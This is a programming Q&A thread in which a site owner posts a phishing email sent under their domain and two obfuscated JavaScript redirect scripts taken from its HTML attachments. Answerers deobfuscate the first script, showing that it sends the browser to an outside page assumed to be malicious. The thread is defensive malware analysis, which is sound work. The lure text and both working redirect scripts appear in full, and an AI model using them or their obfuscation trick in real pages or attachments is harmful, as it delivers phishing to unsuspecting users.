Reputation: 49371
What does this Javascript do?
I've just found out that a spammer is sending email from our domain name, pretending to be us, saying:
Dear Customer,
This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account.
We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.
(C) ourwebsite.com (I changed that)
The attached file is an HTML file that has the following javascript:
<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>
Another email had this:
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ...
Thanks
Upvotes: 4
Views: 1132
Answers (4)
Reputation: 881113
Basically, it appears to set (document['location'])['href'] (or, in regular speak, document.location.href) to http://mvblaw.com/z.htm.
The obfuscation code is pretty simple, just replacing the noise characters with nothing:
var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
// a = http://mvblaw.com/z.htm
var f=document;
var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
// iD = document.location
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
// document.location.href = a (the URL above).
Upvotes: 0
Reputation: 887215
Answer:
The script executes
document.location.href = "http://mvblaw.com/z.htm"; //Evil site (I assume)
It also contains a large number of useless lines to hide the script's true purpose.
Analysis
Here it is unpacked.
function mD() {};
this.aB = 43719;
mD.prototype = {
i: function () {
var w = new Date();
this.j = '';
var x = function () {};
var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
var d = new Date();
y = "";
aL = "";
var f = document;
var s = function () {};
this.yE = "";
aN = "";
var dL = '';
var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
this.v = "v";
var q = 27427;
var m = new Date();
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
dE = '';
k = "";
var qY = function () {};
}
};
xO = false;
var b = new mD();
yY = "";
b.i();
this.xT = '';
Cleaning up the obfuscations and adding meaningful names, it becomes
function TempClass() {};
this.aB = 43719;
TempClass.prototype = {
doIt: function () {
var w = new Date();
this.j = '';
var x = function () {};
var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
var d = new Date();
y = "";
aL = "";
var f = document;
var s = function () {};
this.yE = "";
aN = "";
var dL = '';
var iD = f['location'];
this.v = "v";
var q = 27427;
var m = new Date();
iD['href'] = a;
dE = '';
k = "";
var qY = function () {};
}
};
xO = false;
var b = new TempClass();
yY = "";
b.doIt();
this.xT = '';
Removing all of the useless lines, it becomes
function TempClass() {};
TempClass.prototype = {
doIt: function () {
var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
var f = document;
var iD = f['location'];
iD['href'] = a;
}
};
var b = new TempClass();
b.doIt();
Upvotes: 5
Reputation: 25053
No geniuses, they:
hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
h t t p : / / m v b l a w . c o m / z . h t m
f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
l o c a t i o n
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
h r e f
Didn't even need to run it through regex :)
I'm going to assume they hacked mvblaw and snuck the payload page on there. Anyone with a VM want to see what it does?
Upvotes: 3
Reputation: 827198
The script has a lot of useless stuff just to create confusion, the essential parts of the script are:
function mD() {};
mD.prototype = {
i: function () {
// read between every two letters:
var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'
.replace(/[gJG,\<]/g, '');
var f = document;
var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
}
};
var b = new mD();
b.i();
If we clean up more:
function mD() {};
mD.prototype = {
i: function () {
var a = 'http://mvblaw.com/z.htm';
var f = document;
var iD = f['location'];
iD['href'] = a;
}
};
var b = new mD();
b.i();
And more:
function mD() {};
mD.prototype = {
i: function () {
document.location.href = 'http://mvblaw.com/z.htm';
}
};
var b = new mD();
b.i();
Upvotes: 3
Related Questions
- What does this javascript do
- What does this suspicious and likely malicious code do?
- Site's Been Hacked - What Does This Javascript Code Do?
- What does this script do? Is it malicious?
- What does this script do? Is it malicious?
- What does this javascript do of nasty things?
- What does this script do?
- what does this script do? - hacked site
- What this piece of javascript do? It looks malware
- What does this suspicious phishing code do?